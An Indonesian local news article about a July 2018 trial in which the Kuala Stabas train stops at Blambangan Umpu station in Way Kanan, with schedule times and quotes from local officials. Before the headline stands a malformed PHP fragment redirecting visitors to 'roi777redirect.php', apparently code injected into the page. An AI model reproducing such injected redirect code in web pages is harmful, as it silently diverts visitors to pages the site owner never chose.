header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Hore.., Kereta Api Kuala Stabas Akan Uji Coba Singgah Di Stasiun Blambangan Umpu -
Hore.., Kereta Api Kuala Stabas Akan Uji Coba Singgah Di Stasiun Blambangan Umpu

TRANSLAMPUNG.COM, BLAMBANGAN UMPU – Masyarakat Kabupaten Way Kanan, khususnya kecamatan Blambangan Umpu patut bersuka cita. Pasalnya, mulai tanggal 16 Juli ini, Kereta Api Kuala Stabas yang memiliki kenyamanan interior tersebut akan transit dan singgah di stasiun Blambangan Umpu, dalam uji coba yang akan dilaksanakan selama Lima Belas Hari (16 sampai dengan 31 Juli 2018) mendatang.

Menurut Camat Blambangan Umpu Yustian kepada translampung.com, uji coba tersebut merupakan jawaban usulan masyarakat yang menginginkan Kereta Api Kuala Stabas untuk bisa transit atau singgah di stasiun Blambangan Umpu, yang disampaikan melalui Lurah Blambangan Umpu, yang kemudian ditindak lanjuti oleh dirinya selaku Camat.

Interior Kereta Api Kuala Stabas yang bergaya premium cukup membuat nyaman penumpangnya.

“usulan masyarakat tersebut kami tindak lanjuti dengan berkoordinasi dengan pihak-pihak terkait, dan Alhamdulillah akhirnya keinginan masyarakat itu akan segera membuahkan hasil,” ulas Yustian.

Masih menurut Camat Blambangan Umpu ini, uji coba penyesuaian jadwal perjalanan Ka kuala Stabas di Stasiun Blambangan Umpu, dari arah Baturaja akan datang pada pukul 08.03 wib dan berangkat pada pukul 08.07 wib. Sementara dari arah Tanjung karang, akan sampai di Blambangan Umpu pada pukul 16.06 wib dan berangkat 16.10 wib menuju Baturaja.

Sementara itu Kepala Dinas Perhubungan Kabupaten Way Kanan Achmad Odani membenarkan pernyataan camat Blambangan Umpu tersebut, menurutnya memang ada info ada usulan masyarakat, melalui lurah dan camat Blambangan Umpu tentang permohonan agar KA Kuala Stabas singgah di Stasiun Blambangan Umpu.

“Alhamdulilah jika sudah di Respon Pihak PT KAI, kami juga sudah Koordinasi dengan Dinas Perhubungan Provinsi Lampung, dan bahkan sudah kami persiapkan surat Bupati Way Kanan, yang ditujukan ke PT KAI Divisi IV, permohonan agar Kereta Api dimsksud singgah di stasiun Blambangan Umpu, ibu kota Kabupaten Way Kanan secara permanen,” jelas Odani. (Yudi)

News Reporter